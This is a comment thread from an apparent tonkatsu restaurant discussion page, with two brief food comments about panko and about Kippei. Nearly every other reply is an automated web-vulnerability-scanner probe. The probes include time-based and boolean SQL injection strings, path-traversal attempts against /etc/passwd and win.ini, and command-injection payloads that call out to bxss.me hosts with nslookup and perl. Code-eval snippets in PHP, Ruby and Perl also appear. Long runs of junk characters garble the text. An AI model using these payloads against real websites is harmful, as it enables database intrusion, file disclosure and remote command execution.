.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: JJ
WEB-INF/web.xml
re: JJ
WEB-INF\web.xml
re: JJ
1
re: JJ
1
re: JJ
-1 OR 2+79-79-1=0+0+0+1 --
re: JJ
-1 OR 3+79-79-1=0+0+0+1 --
re: JJ
-1 OR 2+439-439-1=0+0+0+1
re: JJ
-1 OR 3+439-439-1=0+0+0+1
re: JJ
-1' OR 2+417-417-1=0+0+0+1 --
re: JJ
-1' OR 3+417-417-1=0+0+0+1 --
re: JJ
-1' OR 2+482-482-1=0+0+0+1 or 'YmVeQuSI'='
re: JJ
-1' OR 3+482-482-1=0+0+0+1 or 'YmVeQuSI'='
re: JJ
-1" OR 2+609-609-1=0+0+0+1 --
re: JJ
-1" OR 3+609-609-1=0+0+0+1 --
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
3Yn7F3ga'; waitfor delay '0:0:15' --
re: JJ
-5 OR 836=(SELECT 836 FROM PG_SLEEP(15))--
re: JJ
-5) OR 381=(SELECT 381 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 666=(SELECT 666 FROM PG_SLEEP(15))--
re: JJ
IuFhlzEt' OR 68=(SELECT 68 FROM PG_SLEEP(15))--
re: JJ
2Laau9gw') OR 939=(SELECT 939 FROM PG_SLEEP(15))--
re: JJ
dN4emDja')) OR 142=(SELECT 142 FROM PG_SLEEP(15))--
re: JJ
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@eG4UI
re: JJ
1
re: JJ
1
re: JJ
1
Just on Keita, the frying is the same (both are low temp fried in a big copper pot before transferring into hotter oil to finish) but the panko itself is different. The darker one just has more sugar in the panko.
Apparently the extra sugar in the panko that browns goes better with one of the pork breeds, while the low sugar panko goes better with the other.
The low temp fry on both means they both come out juicy and tender though.
re: Eric Yu
ysxTsTSu
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+423-423-1=0+0+0+1
re: Eric Yu
-1 OR 3+423-423-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
ZqRJ3tmW'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 249=(SELECT 249 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 352=(SELECT 352 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 203=(SELECT 203 FROM PG_SLEEP(15))--
re: Eric Yu
hnikZ6Fd' OR 542=(SELECT 542 FROM PG_SLEEP(15))--
re: Eric Yu
E4NGmaA2') OR 93=(SELECT 93 FROM PG_SLEEP(15))--
re: Eric Yu
vBePt16b')) OR 473=(SELECT 473 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@1QZrL
re: Eric Yu
XMj96ENW
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+844-844-1=0+0+0+1
re: Eric Yu
-1 OR 3+844-844-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
HyZ1rUxJ'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 716=(SELECT 716 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 750=(SELECT 750 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 201=(SELECT 201 FROM PG_SLEEP(15))--
re: Eric Yu
ExEvr0On' OR 989=(SELECT 989 FROM PG_SLEEP(15))--
re: Eric Yu
3scanLjA') OR 737=(SELECT 737 FROM PG_SLEEP(15))--
re: Eric Yu
FNwOo839')) OR 987=(SELECT 987 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@m9oIL
re: Eric Yu
1kgenGTCO
re: Eric Yu
response.write(9669157*9519684)
re: Eric Yu
'+response.write(9669157*9519684)+'
re: Eric Yu
"+response.write(9669157*9519684)+"
re: Eric Yu
%0abcc:074625.67-10150.67.88c5e.19990.2@bxss.me
re: Eric Yu
to@example.com>%0d%0abcc:074625.67-10151.67.88c5e.19990.2@bxss.me
re: Eric Yu
../../../../../../../../../../../../../../etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../windows/win.ini
re: Eric Yu
file:///etc/passwd
re: Eric Yu
<esi:include src="http://bxss.me/rpb.png"/>
re: Eric Yu
../../../../../../../../../../../../../../../proc/version
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Eric Yu
../../../../../../../../../../etc/passwd%00.jpg
re: Eric Yu
${10000379+9999167}
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Eric Yu
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Eric Yu
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Eric Yu
/etc/passwd
re: Eric Yu
echo lytjjf$()\ zmwrba\nz^xyu||a #' &echo lytjjf$()\ zmwrba\nz^xyu||a #|" &echo lytjjf$()\ zmwrba\nz^xyu||a #
re: Eric Yu
%2fetc%2fpasswd
re: Eric Yu
&echo slokut$()\ ldrdak\nz^xyu||a #' &echo slokut$()\ ldrdak\nz^xyu||a #|" &echo slokut$()\ ldrdak\nz^xyu||a #
re: Eric Yu
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Eric Yu
|echo cdswjj$()\ iolmwx\nz^xyu||a #' |echo cdswjj$()\ iolmwx\nz^xyu||a #|" |echo cdswjj$()\ iolmwx\nz^xyu||a #
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Eric Yu
)
re: Eric Yu
(nslookup hitqljskrvtai05627.bxss.me||perl -e "gethostbyname('hitqljskrvtai05627.bxss.me')")
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Eric Yu
!(()&&!|*|*|
re: Eric Yu
$(nslookup hitbdlohnwufvcb678.bxss.me||perl -e "gethostbyname('hitbdlohnwufvcb678.bxss.me')")
re: Eric Yu
^(#$!@#$)(()))******
re: Eric Yu
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Eric Yu
&nslookup hitsjsmkzgdkqde91c.bxss.me&'\"`0&nslookup hitsjsmkzgdkqde91c.bxss.me&`'
re: Eric Yu
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Eric Yu
&(nslookup hitecdkskznqsb74bc.bxss.me||perl -e "gethostbyname('hitecdkskznqsb74bc.bxss.me')")&'\"`0&(nslookup hitecdkskznqsb74bc.bxss.me||perl -e "gethostbyname('hitecdkskznqsb74bc.bxss.me')")&`'
re: Eric Yu
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Eric Yu
|(nslookup hithizpalghuq8820d.bxss.me||perl -e "gethostbyname('hithizpalghuq8820d.bxss.me')")
re: Eric Yu
file:///etc/passwd
re: Eric Yu
`(nslookup hitfamxvuhvauecf9b.bxss.me||perl -e "gethostbyname('hitfamxvuhvauecf9b.bxss.me')")`
re: Eric Yu
/\../\../\../\../\../\../\../etc/passwd
re: Eric Yu
;(nslookup hitqqorxpwowk7a516.bxss.me||perl -e "gethostbyname('hitqqorxpwowk7a516.bxss.me')")|(nslookup hitqqorxpwowk7a516.bxss.me||perl -e "gethostbyname('hitqqorxpwowk7a516.bxss.me')")&(nslookup hitqqorxpwowk7a516.bxss.me||perl -e "gethostbyname('hitqqorxpwowk7a516.bxss.me')")
re: Eric Yu
/WEB-INF/web.xml
re: Eric Yu
C:\WINDOWS\system32\drivers\etc\hosts
re: Eric Yu
../../../../../../../../../../windows/win.ini%00.jpg
re: Eric Yu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Eric Yu
/../../../../../../../../../../boot.ini
re: Eric Yu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Eric Yu
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Eric Yu
Http://bxss.me/t/fit.txt
re: Eric Yu
'.gethostbyname(lc('hitsl'.'osybonsz41ff2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(66).chr(117).chr(68).'
re: Eric Yu
..\..\..\..\..\..\..\..\windows\win.ini
re: Eric Yu
http://bxss.me/t/fit.txt%3F.jpg
re: Eric Yu
".gethostbyname(lc("hitxm"."xukhlczd84f73.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(85).chr(122).chr(65)."
re: Eric Yu
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Eric Yu
/etc/shells
re: Eric Yu
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Eric Yu
c:/windows/win.ini
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Eric Yu
bxss.me
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Eric Yu
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Eric Yu
WEB-INF/web.xml
re: Eric Yu
WEB-INF\web.xml
re: Eric Yu
HttP://bxss.me/t/xss.html?%00
re: Eric Yu
"+"A".concat(70-3).concat(22*4).concat(118).concat(83).concat(108).concat(68)+(require"socket"
Socket.gethostbyname("hitau"+"bjjqcrnaf89d6.bxss.me.")[3].to_s)+"
re: Eric Yu
bxss.me/t/xss.html?%00
re: Eric Yu
'+'A'.concat(70-3).concat(22*4).concat(115).concat(66).concat(111).concat(89)+(require'socket'
Socket.gethostbyname('hithc'+'xdzcttlh1e76f.bxss.me.')[3].to_s)+'
re: Eric Yu
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Eric Yu
'"
re: Eric Yu
<!--
re: Eric Yu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Eric Yu
';print(md5(31337));$a='
re: Eric Yu
";print(md5(31337));$a="
re: Eric Yu
${@print(md5(31337))}
re: Eric Yu
${@print(md5(31337))}\
re: Eric Yu
'.print(md5(31337)).'
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
-1 OR 2+797-797-1=0+0+0+1 --
re: Eric Yu
-1 OR 3+797-797-1=0+0+0+1 --
re: Eric Yu
-1 OR 2+845-845-1=0+0+0+1
re: Eric Yu
-1 OR 3+845-845-1=0+0+0+1
re: Eric Yu
-1' OR 2+413-413-1=0+0+0+1 --
re: Eric Yu
-1' OR 3+413-413-1=0+0+0+1 --
re: Eric Yu
-1' OR 2+700-700-1=0+0+0+1 or 'ORXHm5f1'='
re: Eric Yu
-1' OR 3+700-700-1=0+0+0+1 or 'ORXHm5f1'='
re: Eric Yu
-1" OR 2+11-11-1=0+0+0+1 --
re: Eric Yu
-1" OR 3+11-11-1=0+0+0+1 --
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
pkwORxHU'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 111=(SELECT 111 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 487=(SELECT 487 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 261=(SELECT 261 FROM PG_SLEEP(15))--
re: Eric Yu
bEpGW6hY' OR 99=(SELECT 99 FROM PG_SLEEP(15))--
re: Eric Yu
ur6vqT6n') OR 735=(SELECT 735 FROM PG_SLEEP(15))--
re: Eric Yu
RCjVwnqx')) OR 988=(SELECT 988 FROM PG_SLEEP(15))--
re: Eric Yu
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@ONEPY
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
Anyone been to Kippei? I would like to know their style as well. Also, what’s the recommendation at Kippei? Thank you!
re: Justeat
mSQoXcga
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+627-627-1=0+0+0+1
re: Justeat
-1 OR 3+627-627-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
